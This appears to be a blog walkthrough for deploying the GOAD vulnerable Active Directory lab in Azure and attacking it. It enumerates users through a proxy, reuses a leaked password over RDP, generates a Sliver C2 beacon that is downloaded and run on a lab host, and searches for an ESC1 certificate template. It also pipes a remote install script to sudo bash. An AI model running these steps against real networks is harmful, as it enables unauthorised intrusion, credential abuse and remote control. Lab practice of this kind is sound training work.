Guide to setting up GOAD in Azure and spawning a Sliver Beacon Implant - Free Pen Testing Lab (30 days to smash it out 😁)
First things first we need to setup an account in Azure. This gives us a free account with $200 to spend.
You will need to provide a bank card for verification and to charge billing payments to but fear not, we are setting this up for free and the whole lab will be free, for 30 days anyway.
Next we need to upgrade the free account to a pay as you go account. This gives us access to more vCPUs per region and more B Series Burstable Virtual Machine Sizes to build the lab. GOAD requires we have 12 B Series vCPUS to use which isnt default when setting up an Azure account.
Follow this link - https://learn.microsoft.com/en-us/azure/cost-management-billing/manage/upgrade-azure-subscription
This will happen automatically once you have followed the above. Next we need to request extra resources for your Azure Account. When an account is first created, Azure only allows you 10 vCPUs per Region and 10 BSeries vCPUs. I assume this is to prevent fraud or you unknowingly racking up more charges than you can realistically afford.
Go to your account and search subscriptions.
Select your subscription and go to usage and quotas which is under settings
Here you can see the resource quotas you are assigned. Your vCPU per region and B Series will be 10. Mine is now 14 and 12 respectively but you will need to click New Quota Request in the top left
Now heres the lame part, you should be able to adjust the vCPUs per region straight away, the B Series in the other hand requires you opening a ticket with Microsoft. This is painless as its just a few clicks but it does take few days to get the quota adjusted.
Once we have that we are good to go and can now build the GOAD Active Directory Lab in Azure.
Built by Mayfly at Orange CyberDefense (Much appreciated Mayfly - Great Work!) it is described as
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to practice usual attack techniques.
Here is the link - https://github.com/Orange-Cyberdefense/GOAD/tree/main
With that in mind, lets get cracking.
First we need to ensure we have Azure CLI installed. Go ahead and get that installed.
sudo apt install azure-cliHere is the link for installing on Linux if needed - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt
Now thats installed simply run az login
┌──(kali㉿kali)-[~/GOAD]
└─$ az loginThis will spawn a browser session for you to authenticate to azure with your credentials. Enter your creds and then you are authenticated and can now interact with your Azure account through the command line.
We also need terraform installed to run the terraform script and build the lab.
# sudo apt install terraformgit clone the GOAD repo over to your machine
# git clone https://github.com/Orange-Cyberdefense/GOAD.gitMayfly has made the install super simple, head over to here https://github.com/Orange-Cyberdefense/GOAD/blob/main/docs/install_with_azure.md and follow the instruction. Essentially you are just running
./goad.sh -t install -l GOAD -p azureNow go and make a coffee, this will take a while as all the Domain, Users, Groups, Trusts and Services etc need to be built and applied.
Once that has finished and you have'nt encountered any errors you will be presented with a IP for the Ubuntu Jump Server and the location of your SSH Private Key for logging in.
Mine is at /GOAD/ad/GOAD/providers/azure/ssh_keys
Move it over to your Desktop if you want and SSH in. Username is goad
┌──(kali㉿kali)-[~]
└─$ ssh -i Desktop/ubuntu-jumpbox.pem [email protected].***
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1016-azure x86_64)Running ip add shows us the IP assigned and the subnet we are on in the internal network. Our IP is 192.168.56.100 and subnet is 255.255.255.0
goad@ubuntu-jumpbox:~$ ip ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:0d:3a:af:62:51 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.100/24 metric 100 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20d:3aff:feaf:6251/64 scope link
valid_lft forever preferred_lft foreverRun a quick ping sweep to find some alive hosts - Im using pingMe.sh which is a quick subnet ping sweep tool I knocked up https://github.com/deeexcee-io/pingMe. Feel free to use it or any other tool you prefer.
goad@ubuntu-jumpbox:~/pingMe$ bash pingMe.sh
[+] Scanning subnets
[+] 192.168.56.10 is up
[+] 192.168.56.100 is up
[+] 192.168.56.11 is up
[+] 192.168.56.12 is up
[+] 192.168.56.22 is up
[+] 192.168.56.23 is upWe have 6 Hosts return a response. 192.168.56.100 is ours so there are 5 hosts that respond to ping on the network.
Next we need to run crackmapexec. This will give us plenty of information about the hostnames and the Domains in use.
As we dont have crackmapexec installed on the ubuntu box, we could install the tools we need or, a better option in my opinion is to setup a Dynamic SSH Tunnel through the Ubuntu Box from our Kali Machine. This way we have the majority of the tools needed at our disposal and can use proxychains to forward the traffic.
We will be installing sliver on the ubuntu jump hosts as proxying beacons will be a pain but the rest of the tools we will just use on our local kali host.
First check the configuration of your proxychains file tail /etc/proxychains4.conf. My socks4 conf is set to 127.0.0.1 on port 1080
┌──(kali㉿kali)-[~/GOAD]
└─$ tail /etc/proxychains4.conf
# proxy types: http, socks4, socks5, raw
# * raw: The traffic is simply forwarded to the proxy without modification.
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080The port can be any port you want as long as it is not already in use. I'm going to leave mine as 1080.
Now lets setup our Dynamic SSH Tunnel. To do this we need a few options
-D 1080 - Tells SSH to setup a dymanic Tunnel, listening on Port 1080
-N - This states we dont not want to run a command when the tunnel is established
-f - This forks or backgrounds the tunnel
-i - Private key file to useHere is the whole command
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -D 1080 -N -f -i ubuntu-jumpbox.pem [email protected].***We can check it has worked by running ss -tulpn
┌──(kali㉿kali)-[~/Desktop]
└─$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp LISTEN 0 128 127.0.0.1:1080 0.0.0.0:* users:(("ssh",pid=77870,fd=5))
tcp LISTEN 0 50 [::ffff:127.0.0.1]:7474 *:*
tcp LISTEN 0 128 [::1]:1080 [::]:* users:(("ssh",pid=77870,fd=4))
tcp LISTEN 0 4096 [::ffff:127.0.0.1]:7687 *:*As shown, the tunnel has been established on 127.0.0.1:1080
With the hosts we found earlier in a txt file, lets give that to crackmapexec, run it over proxychains and see what we get back.
┌──(kali㉿kali)-[~/GOAD]
└─$ proxychains -q crackmapexec smb hosts.txt
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10.0 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10.0 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)So looking at the results we have 2 Domains (essos.local and devenkingdoms.local), we also have 1 subdomain (north.sevenkingdoms.local)
and also five hostnames
- WINTERFELL
- MEEREEN
- KINGSLANDING
- BRAAVOS
- CASTLEBLACK
WINTERFELL, MEEREEN and KINGSLANDING all have SMB Signing Enabled. This points to them possibly being Domain Controllers due to that being the default setting for DCs. The other 2 are potentially workstations/servers.
Lets do some more recon and see if guest access is enabled on any of the shares, unlikely to see this but it does happen.
┌──(kali㉿kali)-[~/GOAD]
└─$ proxychains -q crackmapexec smb hosts.txt -u '' -p ''
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10.0 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10.0 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\:
SMB 192.168.56.12 445 MEEREEN [+] essos.local\:
SMB 192.168.56.23 445 BRAAVOS [-] essos.local\: STATUS_ACCESS_DENIED
SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.local\:
SMB 192.168.56.22 445 CASTELBLACK [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED It appears that .10, .11 and .12 allow some sort of anonymous interaction.
Lets see if we can get a list of users in the Domains.
┌──(kali㉿kali)-[~/GOAD]
└─$ proxychains -q crackmapexec smb hosts.txt -u '' -p '' --users
SMB 192.168.56.12 445 MEEREEN [*] Windows 10.0 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10.0 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [+] essos.local\:
SMB 192.168.56.23 445 BRAAVOS [-] essos.local\: STATUS_ACCESS_DENIED
SMB 192.168.56.12 445 MEEREEN [-] Error enumerating domain users using dc ip 192.168.56.12: NTLM needs domain\username and a password
SMB 192.168.56.12 445 MEEREEN [*] Trying with SAMRPC protocol
SMB 192.168.56.23 445 BRAAVOS [-] Error enumerating domain users using dc ip 192.168.56.23: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
SMB 192.168.56.23 445 BRAAVOS [*] Trying with SAMRPC protocol
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\:
SMB 192.168.56.11 445 WINTERFELL [-] Error enumerating domain users using dc ip 192.168.56.11: NTLM needs domain\username and a password
SMB 192.168.56.11 445 WINTERFELL [*] Trying with SAMRPC protocol
SMB 192.168.56.22 445 CASTELBLACK [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED
SMB 192.168.56.22 445 CASTELBLACK [-] Error enumerating domain users using dc ip 192.168.56.22: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
SMB 192.168.56.22 445 CASTELBLACK [*] Trying with SAMRPC protocol
SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.local\:
SMB 192.168.56.10 445 KINGSLANDING [-] Error enumerating domain users using dc ip 192.168.56.10: NTLM needs domain\username and a password
SMB 192.168.56.10 445 KINGSLANDING [*] Trying with SAMRPC protocol
SMB 192.168.56.11 445 WINTERFELL [+] Enumerated domain user(s)
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\Guest Built-in account for guest access to the computer/domain
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\arya.stark Arya Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sansa.stark Sansa Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\brandon.stark Brandon Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\rickon.stark Rickon Stark
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\hodor Brainless Giant
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jon.snow Jon Snow
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\samwell.tarly Samwell Tarly (Password : Heartsbane)
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jeor.mormont Jeor Mormont
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sql_svc sql serviceAwesome, we can get all users and there is also a password stored in the user attributes.
samwell.tarly:Heartsbane
Lets see where these can be used, I want an RDP Session as its easier to work with. Use crackmapexec with rdp and the creds.
└─$ proxychains -q crackmapexec rdp hosts.txt -u samwell.tarly -p Heartsbane
RDP 192.168.56.22 3389 CASTELBLACK [*] Windows 10 or Windows Server 2016 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (nla:True)
RDP 192.168.56.23 3389 BRAAVOS [*] Windows 10 or Windows Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) (nla:True)
RDP 192.168.56.11 3389 WINTERFELL [*] Windows 10 or Windows Server 2016 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (nla:True)
RDP 192.168.56.12 3389 MEEREEN [*] Windows 10 or Windows Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) (nla:True)
RDP 192.168.56.10 3389 KINGSLANDING [*] Windows 10 or Windows Server 2016 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) (nla:True)
RDP 192.168.56.22 3389 CASTELBLACK [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane (Pwn3d!)
RDP 192.168.56.23 3389 BRAAVOS [-] essos.local\samwell.tarly:Heartsbane
RDP 192.168.56.11 3389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
RDP 192.168.56.12 3389 MEEREEN [-] essos.local\samwell.tarly:Heartsbane (STATUS_LOGON_FAILURE)
RDP 192.168.56.10 3389 KINGSLANDING [-] sevenkingdoms.local\samwell.tarly:Heartsbane (STATUS_LOGON_FAILURE)Cool, so we can RDP and samwell.tarly is also a local admin on .22 (Pwn3ed!)
Use xfreerdp over proxychains and mount a local folder to make transferring files easy.
proxychains xfreerdp /drive:kali,/home/kali /u:samwell.tarly /v:192.168.56.22
Enter Y to accept the certificate then enter the password
┌──(kali㉿kali)-[~/GOAD]
└─$ proxychains xfreerdp /drive:kali,/home/kali /u:samwell.tarly /v:192.168.56.22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.56.22:3389 ... OK
[12:19:17:669] [138186:138188] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[12:19:17:669] [138186:138188] [INFO][com.freerdp.crypto] - creating directory [/home/kali/.config/freerdp/certs]
[12:19:17:669] [138186:138188] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/server]
[12:19:17:774] [138186:138188] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[12:19:17:774] [138186:138188] [WARN][com.freerdp.crypto] - CN = castelblack.north.sevenkingdoms.local
[12:19:17:775] [138186:138188] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[12:19:17:775] [138186:138188] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[12:19:17:775] [138186:138188] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[12:19:17:775] [138186:138188] [ERROR][com.freerdp.crypto] - The hostname used for this connection (192.168.56.22:3389)
[12:19:17:776] [138186:138188] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[12:19:17:776] [138186:138188] [ERROR][com.freerdp.crypto] - Common Name (CN):
[12:19:17:776] [138186:138188] [ERROR][com.freerdp.crypto] - castelblack.north.sevenkingdoms.local
[12:19:17:776] [138186:138188] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 192.168.56.22:3389 (RDP-Server):
Common Name: castelblack.north.sevenkingdoms.local
Subject: CN = castelblack.north.sevenkingdoms.local
Issuer: CN = castelblack.north.sevenkingdoms.local
Thumbprint: 31:65:cd:a1:df:f2:5f:a1:ba:7a:4e:26:e0:6b:5c:0f:f6:ca:0e:21:eb:b3:3d:e0:9f:c2:bf:52:64:a0:26:ce
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
Password:
[12:19:26:658] [138186:138188] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Eastern
[12:19:26:861] [138186:138188] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32We get presented with an RDP Session. Sweet. Lets get a Sliver Beacon and go from there.
Free to use C2 Framework. I quite like it so far.
Head over to our ubuntu jump box.
Super easy to install just run curl https://sliver.sh/install|sudo bash
Then run sliver
└─$ sliver
Connecting to localhost:31337 ...
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain improvise
[*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > Lets install some extensions, type in armory to get a list of extensions we can use.
For now we are just going to install .net-pivot which includes tools such as rubeus and certify
sliver > armory install .net-pivot
[*] Installing alias 'KrbRelayUp' (v0.0.1) ... done!
[*] Installing alias 'Rubeus' (v0.0.22) ... done!
[*] Installing alias 'Certify' (v0.0.3) ... done!
[*] Installing alias 'SharpSecDump' (v0.0.1) ... done!
[*] Installing alias 'SharpChrome' (v0.0.2) ... done!
[*] Installing alias 'SharpDPAPI' (v0.0.2) ... done!
[*] Installing alias 'sqlrecon' (v0.0.2) ... done!
[*] Installing alias 'SharpLAPS' (v0.0.1) ... done!
sliver > In sliver, generate a beacon
sliver > generate beacon --seconds 27 --jitter 3 --os windows --arch amd64 --http 192.168.56.100 --name beacon --save /tmp/beacon.exe
[*] Generating new windows/amd64 beacon implant binary (27s)
[*] Symbol obfuscation is enabled
[*] Build completed in 1m35s
[*] Implant saved to /tmp/beacon.exe
Now setup a job to await the connection from the beacon
sliver > http
[*] Starting HTTP :80 listener ...
---SNIP---
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
1 http tcp 80Go back to the RDP Session and transfer the .exe over of call from SMB share
PS C:\Users\samwell.tarly> iwr http://192.168.56.100:8080/beacon.exe -o beacon.exe
PS C:\Users\samwell.tarly> ls
Directory: C:\Users\samwell.tarly
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 11/25/2023 10:56 AM 3D Objects
d-r--- 11/25/2023 10:56 AM Contacts
d-r--- 11/25/2023 10:56 AM Desktop
d-r--- 11/25/2023 10:56 AM Documents
d-r--- 11/25/2023 10:56 AM Downloads
d-r--- 11/25/2023 10:56 AM Favorites
d-r--- 11/25/2023 10:56 AM Links
d-r--- 11/25/2023 10:56 AM Music
d-r--- 11/25/2023 10:56 AM Pictures
d-r--- 11/25/2023 10:56 AM Saved Games
d-r--- 11/25/2023 10:56 AM Searches
d-r--- 11/25/2023 10:56 AM Videos
-a---- 11/25/2023 11:06 AM 17221120 beacon.exe
PS C:\Users\samwell.tarly> .\beacon.exeCheck back in Sliver and we should have our beacon returned to us
[*] Beacon 17150820 beacon - 192.168.56.22:52761 (castelblack) - windows/amd64 - Sat, 25 Nov 2023 11:06:49 UTC
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ======== =========== ============= ===================== ================== =============== ===============
17150820 beacon http(s) castelblack NORTH\samwell.tarly windows/amd64 28s 1s To interact with the beacon type use and the ID of the Beacon. As its a beacon and not an active session, Sliver will wait for the beacon to check in then task it with the commands to run, in this case ls
You can check which tasks are pending with the tasks command
sliver > use 17150820-11d0-406f-8500-61f8ee6dd515
[*] Active beacon beacon (17150820-11d0-406f-8500-61f8ee6dd515)
sliver (beacon) > ls
[*] Tasked beacon beacon (48588c0a)
sliver (beacon) > tasks
ID State Message Type Created Sent Completed
========== ========= ============== =============================== ====== ===========
48588c0a pending Ls Sat, 25 Nov 2023 11:08:00 UTC
Now our Beacon is up and running lets look for some vulnerable AD CS Templates.
First check certify is installed
sliver (beacon) > armory install certify
[*] Installing alias 'Certify' (v0.0.3) ... done!Now task our Beacon with looking for vulnerable templates. As there are 2 Domains, check both sevenkingsoms.local and essos.local
sliver (beacon) > certify find /vulnerable /domain:sevenkingdoms.local
[*] Tasked beacon beacon (92ad8c97)
[+] beacon completed task 92ad8c97
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sevenkingdoms,DC=local'
[*] Listing info about the Enterprise CA 'SEVENKINGDOMS-CA'
Enterprise CA Name : SEVENKINGDOMS-CA
DNS Hostname : kingslanding.sevenkingdoms.local
FullName : kingslanding.sevenkingdoms.local\SEVENKINGDOMS-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=SEVENKINGDOMS-CA, DC=sevenkingdoms, DC=local
Cert Thumbprint : CC0F0FAB15A69172D0316D67C16B82F4AF2EB09D
Cert Serial : 348FD6202DDB689F4C266F9416C2C477
Cert Start Date : 11/23/2023 7:48:56 PM
Cert End Date : 11/23/2028 7:58:56 PM
Cert Chain : CN=SEVENKINGDOMS-CA,DC=sevenkingdoms,DC=local
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates SEVENKINGDOMS\Domain Admins S-1-5-21-3592251176-3955304652-3429210345-512
Allow ManageCA, ManageCertificates SEVENKINGDOMS\Enterprise AdminsS-1-5-21-3592251176-3955304652-3429210345-519
Enrollment Agent Restrictions : None
[+] No Vulnerable Certificates Templates found!
Certify completed in 00:00:00.8200730Now on essos.local
sliver (beacon) > certify find /vulnerable /domain:essos.local
[*] Tasked beacon beacon (6e899b21)
[+] beacon completed task 6e899b21
[*] certify output:
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=essos,DC=local'
[*] Listing info about the Enterprise CA 'ESSOS-CA'
Enterprise CA Name : ESSOS-CA
DNS Hostname : braavos.essos.local
FullName : braavos.essos.local\ESSOS-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=ESSOS-CA, DC=essos, DC=local
Cert Thumbprint : 6C831117D04055B46B8119AB190A2E9F4BBB1D73
Cert Serial : 17A6B46504EEABAA433B0FA7AEBD5075
Cert Start Date : 11/23/2023 7:49:01 PM
Cert End Date : 11/23/2028 7:59:00 PM
Cert Chain : CN=ESSOS-CA,DC=essos,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
Allow ManageCA, ManageCertificates ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : braavos.essos.local\ESSOS-CA
Template Name : ESC1
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
mspki-certificate-application-policy : Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS\Domain Users S-1-5-21-2265185071-3335518114-134020291-513
All Extended Rights : ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
NT AUTHORITY\SYSTEM S-1-5-18
Object Control Permissions
Owner : ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
Full Control Principals : ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
NT AUTHORITY\SYSTEM S-1-5-18
WriteOwner Principals : ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
NT AUTHORITY\SYSTEM S-1-5-18
WriteDacl Principals : ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
NT AUTHORITY\SYSTEM S-1-5-18
WriteProperty Principals : ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Domain Admins S-1-5-21-2265185071-3335518114-134020291-512
ESSOS\Enterprise Admins S-1-5-21-2265185071-3335518114-134020291-519
NT AUTHORITY\SYSTEM S-1-5-18
There are a few more vulnerable Certificate Templates but for this one we will be focussing on ESC1 - https://posts.specterops.io/certified-pre-owned-d95910965cd2